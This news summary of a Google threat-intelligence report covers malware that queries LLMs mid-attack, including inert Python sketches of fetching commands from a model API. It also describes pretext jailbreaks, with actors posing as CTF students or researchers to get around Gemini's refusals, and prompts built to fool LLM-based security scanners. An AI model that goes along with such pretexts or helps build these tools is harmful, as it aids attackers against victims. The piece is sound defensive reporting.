Google’s Threat Intelligence Group (GTIG) has identified a significant escalation in the malicious use of artificial intelligence. Adversaries are no longer just using AI for productivity tasks like drafting phishing emails; they are now deploying novel malware that actively uses AI during an attack to dynamically alter its behavior.
This new phase of AI abuse involves what Google calls “Just-in-Time” AI. For the first time, GTIG has identified malware families that query Large Language Models (LLMs) mid-execution, generating malicious scripts or obfuscating their own code on the fly to evade detection rather than relying on hard-coded functions.
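To make that pattern concrete, here is a deliberately inert Python sketch of the “just-in-time” loop GTIG describes: the program ships with no payload and instead requests one from a remote model at runtime. The endpoint, prompt, and response shape are hypothetical placeholders, not details from the report, and the sketch only prints what it receives rather than executing it.

```python
# Illustrative sketch of "Just-in-Time" AI: the binary carries no
# malicious logic and instead requests it from an LLM at runtime.
# The endpoint, prompt, and JSON shape below are hypothetical.
import requests

API_URL = "https://example.invalid/v1/generate"  # placeholder LLM endpoint
PROMPT = "Write a one-line Windows command that lists running processes."

def fetch_generated_command() -> str:
    # A real sample would authenticate with a stolen or free-tier API key.
    resp = requests.post(API_URL, json={"prompt": PROMPT}, timeout=10)
    resp.raise_for_status()
    return resp.json()["text"]

if __name__ == "__main__":
    command = fetch_generated_command()
    # Malware would hand `command` to cmd.exe or subprocess at this point.
    # The sketch stops at printing it, which is the property defenders
    # care about: the payload never exists until the LLM returns it.
    print(command)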
The report details several new malware families using this technique. “PROMPTSTEAL,” observed in active operations, is a data miner that queries an LLM through the Hugging Face API to generate Windows commands for collecting system information (a pattern sketched below). “QUIETVAULT,” also seen in the wild, is a credential stealer that co-opts AI CLI tools already installed on the victim’s machine to hunt for additional secrets. Another family, “FRUITSHELL,” contains hard-coded prompts specifically designed to bypass analysis by LLM-powered security systems. Google also identified experimental malware, including “PROMPTFLUX,” a dropper that uses the Google Gemini API to repeatedly rewrite its own source code to stay hidden, and “PROMPTLOCK,” a proof-of-concept ransomware that generates malicious scripts at runtime.
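For the PROMPTSTEAL case specifically, the traffic pattern looks roughly like the following Python sketch, which uses the real `huggingface_hub` client library. The model ID, token, and prompt are illustrative assumptions, not values from the GTIG report, and the sketch prints the returned commands instead of running them.

```python
# Sketch of the PROMPTSTEAL-style pattern: query a hosted model through
# the Hugging Face Inference API and receive shell commands back.
# The model id, token, and prompt are illustrative, not from the report.
from huggingface_hub import InferenceClient

client = InferenceClient(
    model="some-org/some-code-model",  # hypothetical model id
    token="hf_xxx",                    # attacker-controlled API token
)

generated = client.text_generation(
    "Output one Windows command per line that collects the hostname, "
    "current user, and OS version. Output only the commands.",
    max_new_tokens=100,
)

# PROMPTSTEAL reportedly executes what comes back; this sketch just
# shows the shape a defender would see on the wire: an outbound
# inference call followed by local command execution.
for line in generated.splitlines():
    print("would execute:", line)
```

The design point worth noting is that the commands never appear in the binary itself, so static signatures keyed on hard-coded payloads miss them; the observable artifact shifts to the outbound API call.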
The GTIG report also found that threat actors are adapting familiar social-engineering techniques to bypass AI safety guardrails. Google observed actors posing as students in a “capture-the-flag” competition or as cybersecurity researchers to persuade Gemini to provide information it would otherwise block, such as help with tool development.
State-sponsored actors, including those from North Korea, Iran, and the People’s Republic of China (PRC), continue to use AI models such as Gemini across all stages of their operations, from reconnaissance and phishing-lure creation to developing command-and-control (C2) infrastructure. Google also notes that the underground marketplace for illicit AI tools matured in 2025, offering multifunctional tools that lower the barrier to entry for less sophisticated attackers.
Google stated it is actively disrupting this activity by disabling the projects and accounts associated with these actors. The company emphasized that it is continuously hardening its models, including Gemini, against misuse and is applying this intelligence to strengthen its security classifiers.